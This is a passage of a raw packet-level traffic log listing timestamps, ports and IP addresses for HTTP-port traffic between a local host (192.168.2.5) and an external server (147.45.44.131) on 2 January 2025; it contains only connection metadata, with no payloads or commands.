Jan 2, 2025 19:14:15.030388117 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030400991 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030412912 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030422926 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030435085 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030446053 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030452967 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.030461073 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030487061 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.030530930 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.030530930 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.030657053 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030724049 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030735016 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030745983 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030793905 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.030798912 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030817986 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030829906 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030841112 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030855894 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.030859947 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030872107 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030883074 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030893087 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030904055 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030915022 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030916929 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.030916929 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.030925989 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030934095 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.030939102 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030956030 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.030958891 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030967951 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.030978918 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.030991077 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.030997992 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.031011105 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.031023026 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.031033993 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.031044960 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.031054974 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.031059027 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.031059027 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.031068087 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.031083107 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.031095028 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.031102896 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.031112909 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.031152010 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.031194925 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.031387091 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.113154888 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.113178968 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.113193035 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.113204956 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.113217115 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.113229036 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.113240004 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.113255024 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.113256931 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.113429070 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.114089012 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114100933 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114111900 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114130020 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114141941 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114176035 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.114201069 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114212990 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114224911 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114233971 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114236116 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.114267111 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.114299059 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114326000 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114335060 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.114351034 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114379883 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114379883 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.114392042 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114422083 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114423037 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.114433050 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114439964 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.114528894 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.114602089 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114619970 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114629984 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114634991 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114645958 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114655972 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114669085 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114680052 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114692926 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.114706993 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.114784956 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.114784956 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.115557909 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.115681887 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.115694046 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.115705013 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.115715981 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.115721941 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.115726948 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.115732908 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.115737915 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.115742922 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.115761042 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.115762949 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.115797043 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.115823984 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.115835905 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.115843058 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.115849972 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.115859985 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.115871906 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.115900040 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.115900040 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.115953922 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.115973949 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.115983963 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.115993023 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.116002083 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116013050 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116019011 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116024971 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116029978 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.116034985 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116046906 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.116048098 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116070032 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.116122007 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116133928 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116144896 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116172075 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.116172075 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.116178036 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116189957 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116200924 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116208076 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.116216898 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116230965 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116244078 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116260052 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.116260052 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116260052 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.116314888 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116328955 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116341114 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116352081 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.116352081 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116372108 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.116430998 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116431952 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.116442919 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116455078 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116466999 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116475105 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.116477966 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116485119 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116503954 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.116516113 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116525888 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116535902 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116563082 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116574049 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116585016 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116592884 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.116592884 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.116592884 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.116601944 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116616011 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116638899 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.116739035 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116751909 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116767883 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116779089 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116787910 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.116796970 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.116796970 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.116858006 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.116858006 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.117089033 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117132902 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117144108 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117158890 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117170095 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117213964 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117228031 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117239952 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117249966 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.117252111 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117290020 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.117305040 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117316961 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117326975 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117333889 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117347956 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.117347956 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.117439032 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117463112 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117471933 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.117475986 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117486954 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117497921 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117502928 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.117511034 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117541075 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.117548943 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.117558002 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117571115 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117588997 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117599964 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117610931 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117620945 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117633104 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117662907 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.117679119 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.117679119 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.117742062 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117753029 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117765903 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117774963 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.117866039 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.162667990 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.162698984 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.162718058 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.162729025 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.162740946 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.162751913 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.162765026 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.162775040 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.162775993 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.162853956 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.162945986 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.199862957 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.199878931 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.199889898 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.199918985 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.199940920 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.199949980 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.199951887 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.199958086 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.199958086 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.200023890 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.200023890 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.200884104 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.200896978 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.200907946 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.200926065 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.200943947 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.200956106 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.200961113 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.200973988 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.200984001 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.200999975 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.201040030 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.201126099 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.201128960 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.201236963 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.201247931 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.201258898 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.201270103 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.201281071 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.201291084 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.201302052 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.201307058 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.201314926 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.201344013 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.201356888 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.201363087 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.201375961 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.201383114 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.201389074 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.201390982 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.201402903 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.201431036 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.201431036 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.201431036 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.202373028 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.202455044 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.202472925 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.202485085 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.202496052 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.202516079 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.202522039 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.202528000 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.202534914 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.202547073 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.202558994 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.202569008 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.202579975 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.202590942 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.202601910 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.202611923 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.202620983 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.202620983 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.202620983 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.202626944 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.202691078 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.202866077 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.202883959 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.202897072 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.202904940 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.202908993 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.202920914 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.202936888 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.202950001 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.202954054 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.202961922 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.202971935 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.202986956 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.202986956 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.203105927 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203116894 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203126907 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203142881 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203146935 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.203155994 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.203161001 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203172922 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203182936 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203193903 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203205109 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203216076 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203231096 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203243017 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203252077 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.203252077 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.203252077 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.203253031 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203293085 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.203293085 CET	49721	80	192.168.2.5	147.45.44.131
Jan 2, 2025 19:14:15.203366995 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203380108 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203389883 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203401089 CET	80	49721	147.45.44.131	192.168.2.5
Jan 2, 2025 19:14:15.203412056 CET	49721	80	192.168.2.5	147.45.44.131
